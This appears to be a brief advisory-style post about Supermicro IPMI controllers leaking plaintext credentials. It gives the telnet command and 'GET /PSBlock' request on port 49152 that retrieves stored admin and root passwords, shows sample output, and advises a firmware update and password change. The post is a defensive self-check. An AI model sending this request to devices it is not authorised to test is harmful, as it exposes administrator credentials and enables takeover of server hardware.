Simply telnet to the IPMI IP Address in port 49152 and do a specific GET request. You should get your users and passwords if you're compromised.
telnet server.example.com 49152
After the connection ask for GET /PSBlock
and watch the results, it should be something like this:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Answer:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
To solve this issue update the IPMI firmware to the latest version. The firmware is specific to your IPMI controller, so you should get the specified in Supermicro website.
Then after updating the firmware change your passwords.